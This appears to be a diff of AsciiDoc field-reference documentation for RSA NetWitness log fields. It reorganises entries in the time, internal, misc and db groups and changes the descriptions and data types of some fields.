+*`rsa.misc.audit_object`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_cid`*:: +*`rsa.misc.auditdata`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_ctime`*:: +*`rsa.misc.benchmark`*:: + -- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date +type: keyword -- -*`rsa.internal.mcb_req`*:: +*`rsa.misc.bypass`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcb_res`*:: +*`rsa.misc.cache`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcbc_req`*:: +*`rsa.misc.cache_hit`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.mcbc_res`*:: +*`rsa.misc.cefversion`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.medium`*:: +*`rsa.misc.cfg_attr`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - -type: long +type: keyword -- -*`rsa.internal.node_name`*:: +*`rsa.misc.cfg_obj`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.nwe_callback_id`*:: +*`rsa.misc.cfg_path`*:: + -- -This key denotes that event is endpoint related - type: keyword -- -*`rsa.internal.parse_error`*:: +*`rsa.misc.changes`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.payload_req`*:: +*`rsa.misc.client_ip`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.payload_res`*:: +*`rsa.misc.clustermembers`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.process_vid_dst`*:: +*`rsa.misc.cn_acttimeout`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - type: keyword -- -*`rsa.internal.process_vid_src`*:: +*`rsa.misc.cn_asn_src`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - type: keyword -- -*`rsa.internal.rid`*:: +*`rsa.misc.cn_bgpv4nxthop`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.session_split`*:: +*`rsa.misc.cn_ctr_dst_code`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.site`*:: +*`rsa.misc.cn_dst_tos`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.size`*:: +*`rsa.misc.cn_dst_vlan`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.sourcefile`*:: +*`rsa.misc.cn_engine_id`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.ubc_req`*:: +*`rsa.misc.cn_engine_type`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.ubc_res`*:: +*`rsa.misc.cn_f_switch`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.word`*:: +*`rsa.misc.cn_flowsampid`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`rsa.misc.cn_flowsampintv`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: keyword -- -*`rsa.time.duration_time`*:: +*`rsa.misc.cn_flowsampmode`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`rsa.misc.cn_inacttimeout`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`rsa.misc.cn_inpermbyts`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: +*`rsa.misc.cn_inpermpckts`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`rsa.misc.cn_invalid`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: +*`rsa.misc.cn_ip_proto_ver`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`rsa.misc.cn_ipv4_ident`*:: + -- -This key is used to capture the timezone of the Event Time - type: keyword -- -*`rsa.time.duration_str`*:: +*`rsa.misc.cn_l_switch`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`rsa.misc.cn_log_did`*:: + -- type: keyword -- -*`rsa.time.year`*:: +*`rsa.misc.cn_log_rid`*:: + -- type: keyword -- -*`rsa.time.recorded_time`*:: +*`rsa.misc.cn_max_ttl`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`rsa.misc.cn_maxpcktlen`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`rsa.misc.cn_min_ttl`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: keyword -- -*`rsa.time.expire_time`*:: +*`rsa.misc.cn_minpcktlen`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: keyword -- -*`rsa.time.process_time`*:: +*`rsa.misc.cn_mpls_lbl_1`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`rsa.misc.cn_mpls_lbl_10`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`rsa.misc.cn_mpls_lbl_2`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`rsa.misc.cn_mpls_lbl_3`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`rsa.misc.cn_mpls_lbl_4`*:: + -- -This key is the Time that the event was queued. - -type: date +type: keyword -- -*`rsa.time.p_time1`*:: +*`rsa.misc.cn_mpls_lbl_5`*:: + -- type: keyword -- -*`rsa.time.tzone`*:: +*`rsa.misc.cn_mpls_lbl_6`*:: + -- type: keyword -- -*`rsa.time.eventtime`*:: +*`rsa.misc.cn_mpls_lbl_7`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`rsa.misc.cn_mpls_lbl_8`*:: + -- type: keyword -- -*`rsa.time.gmttime`*:: +*`rsa.misc.cn_mpls_lbl_9`*:: + -- type: keyword -- -*`rsa.time.p_date`*:: +*`rsa.misc.cn_mplstoplabel`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`rsa.misc.cn_mplstoplabip`*:: + -- type: keyword -- -*`rsa.time.p_time`*:: +*`rsa.misc.cn_mul_dst_byt`*:: + -- type: keyword -- -*`rsa.time.p_time2`*:: +*`rsa.misc.cn_mul_dst_pks`*:: + -- type: keyword -- -*`rsa.time.p_year`*:: +*`rsa.misc.cn_muligmptype`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`rsa.misc.cn_sampalgo`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - type: keyword -- -*`rsa.time.stamp`*:: +*`rsa.misc.cn_sampint`*:: + -- -Deprecated key defined only in table map. - -type: date +type: keyword -- - -*`rsa.misc.action`*:: +*`rsa.misc.cn_seqctr`*:: + -- type: keyword -- -*`rsa.misc.result`*:: +*`rsa.misc.cn_spackets`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - type: keyword -- -*`rsa.misc.severity`*:: +*`rsa.misc.cn_src_tos`*:: + -- -This key is used to capture the severity given the session - type: keyword -- -*`rsa.misc.event_type`*:: +*`rsa.misc.cn_src_vlan`*:: + -- -This key captures the event category type as specified by the event source. - type: keyword -- -*`rsa.misc.reference_id`*:: +*`rsa.misc.cn_sysuptime`*:: + -- -This key is used to capture an event id from the session directly - type: keyword -- -*`rsa.misc.version`*:: +*`rsa.misc.cn_template_id`*:: + -- -This key captures Version of the application or OS which is generating the event. - type: keyword -- -*`rsa.misc.disposition`*:: +*`rsa.misc.cn_totbytsexp`*:: + -- -This key captures the The end state of an action. - type: keyword -- -*`rsa.misc.result_code`*:: +*`rsa.misc.cn_totflowexp`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - type: keyword -- -*`rsa.misc.category`*:: +*`rsa.misc.cn_totpcktsexp`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - type: keyword -- -*`rsa.misc.obj_name`*:: +*`rsa.misc.cn_unixnanosecs`*:: + -- -This is used to capture name of object - type: keyword -- -*`rsa.misc.obj_type`*:: +*`rsa.misc.cn_v6flowlabel`*:: + -- -This is used to capture type of object - type: keyword -- -*`rsa.misc.event_source`*:: +*`rsa.misc.cn_v6optheaders`*:: + -- -This key captures Source of the event that’s not a hostname - type: keyword -- -*`rsa.misc.log_session_id`*:: +*`rsa.misc.comp_class`*:: + -- -This key is used to capture a sessionid from the session directly - type: keyword -- -*`rsa.misc.group`*:: +*`rsa.misc.comp_name`*:: + -- -This key captures the Group Name value - type: keyword -- -*`rsa.misc.policy_name`*:: +*`rsa.misc.comp_rbytes`*:: + -- -This key is used to capture the Policy Name only. - type: keyword -- -*`rsa.misc.rule_name`*:: +*`rsa.misc.comp_sbytes`*:: + -- -This key captures the Rule Name - type: keyword -- -*`rsa.misc.context`*:: +*`rsa.misc.cpu_data`*:: + -- -This key captures Information which adds additional context to the event. - type: keyword -- -*`rsa.misc.change_new`*:: +*`rsa.misc.criticality`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.space`*:: +*`rsa.misc.cs_agency_dst`*:: + -- type: keyword -- -*`rsa.misc.client`*:: +*`rsa.misc.cs_analyzedby`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - type: keyword -- -*`rsa.misc.msgIdPart1`*:: +*`rsa.misc.cs_av_other`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart2`*:: +*`rsa.misc.cs_av_primary`*:: + -- type: keyword -- -*`rsa.misc.change_old`*:: +*`rsa.misc.cs_av_secondary`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.operation_id`*:: +*`rsa.misc.cs_bgpv6nxthop`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - type: keyword -- -*`rsa.misc.event_state`*:: +*`rsa.misc.cs_bit9status`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - type: keyword -- -*`rsa.misc.group_object`*:: +*`rsa.misc.cs_context`*:: + -- -This key captures a collection/grouping of entities. Specific usage - type: keyword -- -*`rsa.misc.node`*:: +*`rsa.misc.cs_control`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - type: keyword -- -*`rsa.misc.rule`*:: +*`rsa.misc.cs_data`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`rsa.misc.cs_datecret`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - type: keyword -- -*`rsa.misc.param`*:: +*`rsa.misc.cs_dst_tld`*:: + -- -This key is the parameters passed as part of a command or application, etc. - type: keyword -- -*`rsa.misc.change_attrib`*:: +*`rsa.misc.cs_eth_dst_ven`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.event_computer`*:: +*`rsa.misc.cs_eth_src_ven`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - type: keyword -- -*`rsa.misc.reference_id1`*:: +*`rsa.misc.cs_event_uuid`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - type: keyword -- -*`rsa.misc.event_log`*:: +*`rsa.misc.cs_filetype`*:: + -- -This key captures the Name of the event log - type: keyword -- -*`rsa.misc.OS`*:: +*`rsa.misc.cs_fld`*:: + -- -This key captures the Name of the Operating System - type: keyword -- -*`rsa.misc.terminal`*:: +*`rsa.misc.cs_if_desc`*:: + -- -This key captures the Terminal Names only - type: keyword -- -*`rsa.misc.msgIdPart3`*:: +*`rsa.misc.cs_if_name`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`rsa.misc.cs_ip_next_hop`*:: + -- -This key captures Filter used to reduce result set - type: keyword -- -*`rsa.misc.serial_number`*:: +*`rsa.misc.cs_ipv4dstpre`*:: + -- -This key is the Serial number associated with a physical asset. - type: keyword -- -*`rsa.misc.checksum`*:: +*`rsa.misc.cs_ipv4srcpre`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - type: keyword -- -*`rsa.misc.event_user`*:: +*`rsa.misc.cs_lifetime`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. - type: keyword -- -*`rsa.misc.virusname`*:: +*`rsa.misc.cs_log_medium`*:: + -- -This key captures the name of the virus - type: keyword -- -*`rsa.misc.content_type`*:: +*`rsa.misc.cs_loginname`*:: + -- -This key is used to capture Content Type only. - type: keyword -- -*`rsa.misc.group_id`*:: +*`rsa.misc.cs_modulescore`*:: + -- -This key captures Group ID Number (related to the group name) - type: keyword -- -*`rsa.misc.policy_id`*:: +*`rsa.misc.cs_modulesign`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - type: keyword -- -*`rsa.misc.vsys`*:: +*`rsa.misc.cs_opswatresult`*:: + -- -This key captures Virtual System Name - type: keyword -- -*`rsa.misc.connection_id`*:: +*`rsa.misc.cs_payload`*:: + -- -This key captures the Connection ID - type: keyword -- -*`rsa.misc.reference_id2`*:: +*`rsa.misc.cs_registrant`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - type: keyword -- -*`rsa.misc.sensor`*:: +*`rsa.misc.cs_registrar`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - type: keyword -- -*`rsa.misc.sig_id`*:: +*`rsa.misc.cs_represult`*:: + -- -This key captures IDS/IPS Int Signature ID - -type: long +type: keyword -- -*`rsa.misc.port_name`*:: +*`rsa.misc.cs_rpayload`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`rsa.misc.cs_sampler_name`*:: + -- -This key captures the Rule group name - type: keyword -- -*`rsa.misc.risk_num`*:: +*`rsa.misc.cs_sourcemodule`*:: + -- -This key captures a Numeric Risk value - -type: double +type: keyword -- -*`rsa.misc.trigger_val`*:: +*`rsa.misc.cs_streams`*:: + -- -This key captures the Value of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.log_session_id1`*:: +*`rsa.misc.cs_targetmodule`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - type: keyword -- -*`rsa.misc.comp_version`*:: +*`rsa.misc.cs_v6nxthop`*:: + -- -This key captures the Version level of a sub-component of a product. - type: keyword -- -*`rsa.misc.content_version`*:: +*`rsa.misc.cs_whois_server`*:: + -- -This key captures Version level of a signature or database content. - type: keyword -- -*`rsa.misc.hardware_id`*:: +*`rsa.misc.cs_yararesult`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - type: keyword -- -*`rsa.misc.risk`*:: +*`rsa.misc.description`*:: + -- -This key captures the non-numeric risk value - type: keyword -- -*`rsa.misc.event_id`*:: +*`rsa.misc.devvendor`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`rsa.misc.distance`*:: + -- type: keyword -- -*`rsa.misc.status`*:: +*`rsa.misc.dstburb`*:: + -- type: keyword -- -*`rsa.misc.mail_id`*:: +*`rsa.misc.edomain`*:: + -- -This key is used to capture the mailbox id/name - type: keyword -- -*`rsa.misc.rule_uid`*:: +*`rsa.misc.edomaub`*:: + -- -This key is the Unique Identifier for a rule. - type: keyword -- -*`rsa.misc.trigger_desc`*:: +*`rsa.misc.euid`*:: + -- -This key captures the Description of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.inout`*:: +*`rsa.misc.facility`*:: + -- type: keyword -- -*`rsa.misc.p_msgid`*:: +*`rsa.misc.finterface`*:: + -- type: keyword -- -*`rsa.misc.data_type`*:: +*`rsa.misc.flags`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart4`*:: +*`rsa.misc.gaddr`*:: + -- type: keyword -- -*`rsa.misc.error`*:: +*`rsa.misc.id3`*:: + -- -This key captures All non successful Error codes or responses - type: keyword -- -*`rsa.misc.index`*:: +*`rsa.misc.im_buddyname`*:: + -- type: keyword -- -*`rsa.misc.listnum`*:: +*`rsa.misc.im_croomid`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - type: keyword -- -*`rsa.misc.ntype`*:: +*`rsa.misc.im_croomtype`*:: + -- type: keyword -- -*`rsa.misc.observed_val`*:: +*`rsa.misc.im_members`*:: + -- -This key captures the Value observed (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.policy_value`*:: +*`rsa.misc.im_username`*:: + -- -This key captures the contents of the policy. This contains details about the policy - type: keyword -- -*`rsa.misc.pool_name`*:: +*`rsa.misc.ipkt`*:: + -- -This key captures the name of a resource pool - type: keyword -- -*`rsa.misc.rule_template`*:: +*`rsa.misc.ipscat`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template - type: keyword -- -*`rsa.misc.count`*:: +*`rsa.misc.ipspri`*:: + -- type: keyword -- -*`rsa.misc.number`*:: +*`rsa.misc.latitude`*:: + -- type: keyword -- -*`rsa.misc.sigcat`*:: +*`rsa.misc.linenum`*:: + -- type: keyword -- -*`rsa.misc.type`*:: +*`rsa.misc.list_name`*:: + -- type: keyword -- -*`rsa.misc.comments`*:: +*`rsa.misc.load_data`*:: + -- -Comment information provided in the log message - type: keyword -- -*`rsa.misc.doc_number`*:: +*`rsa.misc.location_floor`*:: + -- -This key captures File Identification number - -type: long +type: keyword -- -*`rsa.misc.expected_val`*:: +*`rsa.misc.location_mark`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.job_num`*:: +*`rsa.misc.log_id`*:: + -- -This key captures the Job Number - type: keyword -- -*`rsa.misc.spi_dst`*:: +*`rsa.misc.log_type`*:: + -- -Destination SPI Index - type: keyword -- -*`rsa.misc.spi_src`*:: +*`rsa.misc.logid`*:: + -- -Source SPI Index - type: keyword -- -*`rsa.misc.code`*:: +*`rsa.misc.logip`*:: + -- type: keyword -- -*`rsa.misc.agent_id`*:: +*`rsa.misc.logname`*:: + -- -This key is used to capture agent id - type: keyword -- -*`rsa.misc.message_body`*:: +*`rsa.misc.longitude`*:: + --- -This key captures the The contents of the message body. - +-- type: keyword -- -*`rsa.misc.phone`*:: +*`rsa.misc.lport`*:: + -- type: keyword -- -*`rsa.misc.sig_id_str`*:: +*`rsa.misc.mbug_data`*:: + -- -This key captures a string object of the sigid variable. - type: keyword -- -*`rsa.misc.cmd`*:: +*`rsa.misc.misc_name`*:: + -- type: keyword -- -*`rsa.misc.misc`*:: +*`rsa.misc.msg_type`*:: + -- type: keyword -- -*`rsa.misc.name`*:: +*`rsa.misc.msgid`*:: + -- type: keyword -- -*`rsa.misc.cpu`*:: +*`rsa.misc.netsessid`*:: + -- -This key is the CPU time used in the execution of the event being recorded. - -type: long +type: keyword -- -*`rsa.misc.event_desc`*:: +*`rsa.misc.num`*:: + -- -This key is used to capture a description of an event available directly or inferred - type: keyword -- -*`rsa.misc.sig_id1`*:: +*`rsa.misc.number1`*:: + -- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id - -type: long +type: keyword -- -*`rsa.misc.im_buddyid`*:: +*`rsa.misc.number2`*:: + -- type: keyword -- -*`rsa.misc.im_client`*:: +*`rsa.misc.nwwn`*:: + -- type: keyword -- -*`rsa.misc.im_userid`*:: +*`rsa.misc.object`*:: + -- type: keyword -- -*`rsa.misc.pid`*:: +*`rsa.misc.operation`*:: + -- type: keyword -- -*`rsa.misc.priority`*:: +*`rsa.misc.opkt`*:: + -- type: keyword -- -*`rsa.misc.context_subject`*:: +*`rsa.misc.orig_from`*:: + -- -This key is to be used in an audit context where the subject is the object being identified - type: keyword -- -*`rsa.misc.context_target`*:: +*`rsa.misc.owner_id`*:: + -- type: keyword -- -*`rsa.misc.cve`*:: +*`rsa.misc.p_action`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. - type: keyword -- -*`rsa.misc.fcatnum`*:: +*`rsa.misc.p_filter`*:: + -- -This key captures Filter Category Number. Legacy Usage - type: keyword -- -*`rsa.misc.library`*:: +*`rsa.misc.p_group_object`*:: + -- -This key is used to capture library information in mainframe devices - type: keyword -- -*`rsa.misc.parent_node`*:: +*`rsa.misc.p_id`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - type: keyword -- -*`rsa.misc.risk_info`*:: +*`rsa.misc.p_msgid1`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`rsa.misc.p_msgid2`*:: + -- -This key is captures the TCP flags set in any packet of session - -type: long +type: keyword -- -*`rsa.misc.tos`*:: +*`rsa.misc.p_result1`*:: + -- -This key describes the type of service - -type: long +type: keyword -- -*`rsa.misc.vm_target`*:: +*`rsa.misc.password_chg`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`rsa.misc.password_expire`*:: + -- -This key captures Workspace Description - type: keyword -- -*`rsa.misc.command`*:: +*`rsa.misc.permgranted`*:: + -- type: keyword -- -*`rsa.misc.event_category`*:: +*`rsa.misc.permwanted`*:: + -- type: keyword -- -*`rsa.misc.facilityname`*:: +*`rsa.misc.pgid`*:: + -- type: keyword -- -*`rsa.misc.forensic_info`*:: +*`rsa.misc.policyUUID`*:: + -- type: keyword -- -*`rsa.misc.jobname`*:: +*`rsa.misc.prog_asp_num`*:: + -- type: keyword -- -*`rsa.misc.mode`*:: +*`rsa.misc.program`*:: + -- type: keyword -- -*`rsa.misc.policy`*:: +*`rsa.misc.real_data`*:: + -- type: keyword -- -*`rsa.misc.policy_waiver`*:: +*`rsa.misc.rec_asp_device`*:: + -- type: keyword -- -*`rsa.misc.second`*:: +*`rsa.misc.rec_asp_num`*:: + -- type: keyword -- -*`rsa.misc.space1`*:: +*`rsa.misc.rec_library`*:: + -- type: keyword -- -*`rsa.misc.subcategory`*:: +*`rsa.misc.recordnum`*:: + -- type: keyword -- -*`rsa.misc.tbdstr2`*:: +*`rsa.misc.ruid`*:: + -- type: keyword -- -*`rsa.misc.alert_id`*:: +*`rsa.misc.sburb`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`rsa.misc.sdomain_fld`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`rsa.misc.sec`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - type: keyword -- -*`rsa.misc.fresult`*:: +*`rsa.misc.sensorname`*:: + -- -This key captures the Filter Result - -type: long +type: keyword -- -*`rsa.misc.payload_dst`*:: +*`rsa.misc.seqnum`*:: + -- -This key is used to capture destination payload - type: keyword -- -*`rsa.misc.payload_src`*:: +*`rsa.misc.session`*:: + -- -This key is used to capture source payload - type: keyword -- -*`rsa.misc.pool_id`*:: +*`rsa.misc.sessiontype`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - type: keyword -- -*`rsa.misc.process_id_val`*:: +*`rsa.misc.sigUUID`*:: + -- -This key is a failure key for Process ID when it is not an integer value - type: keyword -- -*`rsa.misc.risk_num_comm`*:: +*`rsa.misc.spi`*:: + -- -This key captures Risk Number Community - -type: double +type: keyword -- -*`rsa.misc.risk_num_next`*:: +*`rsa.misc.srcburb`*:: + -- -This key captures Risk Number NextGen - -type: double +type: keyword -- -*`rsa.misc.risk_num_sand`*:: +*`rsa.misc.srcdom`*:: + -- -This key captures Risk Number SandBox - -type: double +type: keyword -- -*`rsa.misc.risk_num_static`*:: +*`rsa.misc.srcservice`*:: + -- -This key captures Risk Number Static - -type: double +type: keyword -- -*`rsa.misc.risk_suspicious`*:: +*`rsa.misc.state`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.risk_warning`*:: +*`rsa.misc.status1`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.snmp_oid`*:: +*`rsa.misc.svcno`*:: + -- -SNMP Object Identifier - type: keyword -- -*`rsa.misc.sql`*:: +*`rsa.misc.system`*:: + -- -This key captures the SQL query - type: keyword -- -*`rsa.misc.vuln_ref`*:: +*`rsa.misc.tbdstr1`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`rsa.misc.tgtdom`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`rsa.misc.tgtdomain`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`rsa.misc.threshold`*:: + -- type: keyword -- -*`rsa.misc.acl_table`*:: +*`rsa.misc.type1`*:: + -- type: keyword -- -*`rsa.misc.admin`*:: +*`rsa.misc.udb_class`*:: + -- type: keyword -- -*`rsa.misc.alarm_id`*:: +*`rsa.misc.url_fld`*:: + -- type: keyword -- -*`rsa.misc.alarmname`*:: +*`rsa.misc.user_div`*:: + -- type: keyword -- -*`rsa.misc.app_id`*:: +*`rsa.misc.userid`*:: + -- type: keyword -- -*`rsa.misc.audit`*:: +*`rsa.misc.username_fld`*:: + -- type: keyword -- -*`rsa.misc.audit_object`*:: +*`rsa.misc.utcstamp`*:: + -- type: keyword -- -*`rsa.misc.auditdata`*:: +*`rsa.misc.v_instafname`*:: + -- type: keyword -- -*`rsa.misc.benchmark`*:: +*`rsa.misc.virt_data`*:: + -- type: keyword -- -*`rsa.misc.bypass`*:: +*`rsa.misc.vpnid`*:: + -- type: keyword -- -*`rsa.misc.cache`*:: +*`rsa.misc.autorun_type`*:: + -- +This is used to capture Auto Run type + type: keyword -- -*`rsa.misc.cache_hit`*:: +*`rsa.misc.cc_number`*:: + -- -type: keyword +Valid Credit Card Numbers only + +type: long -- -*`rsa.misc.cefversion`*:: +*`rsa.misc.content`*:: + -- +This key captures the content type from protocol headers + type: keyword -- -*`rsa.misc.cfg_attr`*:: +*`rsa.misc.ein_number`*:: + -- -type: keyword +Employee Identification Numbers only + +type: long -- -*`rsa.misc.cfg_obj`*:: +*`rsa.misc.found`*:: + -- +This is used to capture the results of regex match + type: keyword -- -*`rsa.misc.cfg_path`*:: +*`rsa.misc.language`*:: + -- +This is used to capture list of languages the client support and what it prefers + type: keyword -- -*`rsa.misc.changes`*:: +*`rsa.misc.lifetime`*:: + -- -type: keyword +This key is used to capture the session lifetime in seconds. + +type: long -- -*`rsa.misc.client_ip`*:: +*`rsa.misc.link`*:: + -- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.misc.clustermembers`*:: +*`rsa.misc.match`*:: + -- +This key is for regex match name from search.ini + type: keyword -- -*`rsa.misc.cn_acttimeout`*:: +*`rsa.misc.param_dst`*:: + -- +This key captures the command line/launch argument of the target process or file + type: keyword -- -*`rsa.misc.cn_asn_src`*:: +*`rsa.misc.param_src`*:: + -- +This key captures source parameter + type: keyword -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`rsa.misc.search_text`*:: + -- +This key captures the Search Text used + type: keyword -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`rsa.misc.sig_name`*:: + -- +This key is used to capture the Signature Name only. + type: keyword -- -*`rsa.misc.cn_dst_tos`*:: +*`rsa.misc.snmp_value`*:: + -- +SNMP set request value + type: keyword -- -*`rsa.misc.cn_dst_vlan`*:: +*`rsa.misc.streams`*:: + -- -type: keyword +This key captures number of streams in session + +type: long -- -*`rsa.misc.cn_engine_id`*:: + +*`rsa.db.index`*:: + -- +This key captures IndexID of the index. + type: keyword -- -*`rsa.misc.cn_engine_type`*:: +*`rsa.db.instance`*:: + -- +This key is used to capture the database server instance name + type: keyword -- -*`rsa.misc.cn_f_switch`*:: 